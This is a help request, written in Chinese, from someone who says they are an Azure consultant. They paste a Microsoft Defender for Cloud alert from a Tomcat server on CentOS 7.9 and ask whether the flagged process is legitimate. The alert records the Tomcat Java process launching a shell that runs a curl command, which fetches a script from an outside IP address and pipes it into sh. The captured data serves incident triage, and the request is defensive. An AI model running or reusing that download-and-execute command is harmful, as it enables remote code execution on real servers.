我是一名 Azure 顾问,我收到了适用于 CentOS Linux 的 Microsoft Defender 云“网络服务执行的可疑进程”警报。
环境:Tomcat Apache在CentOS Linux 7.9.0上运行
Defender 警报详细信息如下:
1/6/2024 9:11:14 PM
[7402] java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Command line /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre//bin/java -Djava.util.logging.config.file=/opt/tomcat/conf/logging.properties -Djava.util.logging.manager=org.apache.juli.ClassLoaderLogManager -Djava.security.egd=file:///dev/urandom -Djava.awt.headless=true -Djdk.tls.ephemeralDHKeySize=2048 -Djava.protocol.handler.pkgs=org.apache.catalina.webresources -Dorg.apache.catalina.security.SecurityListener.UMASK=0027 -Xms512M -Xmx1024M -server -XX:+UseParallelGC -Dignore.endorsed.dirs= -classpath /opt/tomcat/bin/bootstrap.jar:/opt/tomcat/bin/tomcat-juli.jar -Dcatalina.base=/opt/tomcat -Dcatalina.home=/opt/tomcat -Djava.io.tmpdir=/opt/tomcat/temp org.apache.catalina.startup.Bootstrap start
Process id 7402
Image file path /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.372.b07-1.el7_9.x86_64/jre/bin/java
Image file SHA1 2bffb1d3d46365ca0e78f96577123814b54dbe88
Image file last modification time May 15, 2023 8:25:05 PM
Image file java
Effective user tomcat
1/6/2024 9:11:14 PM
[7402] bash /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Command line /bin/sh -c "cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh"
Process id 7402
Image file path /usr/bin/bash
Image file SHA1 9ad737cbd8bbdddc96726156dbd3bc03936bf02f
Image file last modification time Nov 24, 2021 10:03:27 PM
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Image file bash
Effective user tomcat
Referenced in commandline http://222.108.161.27:7070/docs/da.txt
Referenced in commandline 222.108.161.27
1/6/2024 9:11:14 PM
bash was executed by a network service 'java'
Script content cd / ;curl -fsSL http://222.108.161.27:7070/docs/da.txt |sh
Mitre techniques T1505: Server Software Component, T1059: Command and Scripting Interpreter, T1059.004: Unix Shell, T1505.003: Web Shell, T1190: Exploit Public-Facing Application
Suspicious process executed by a network service New Detected High
我需要帮助理解上述警报详细信息。该进程是在 CentOS 内部发生还是可疑活动?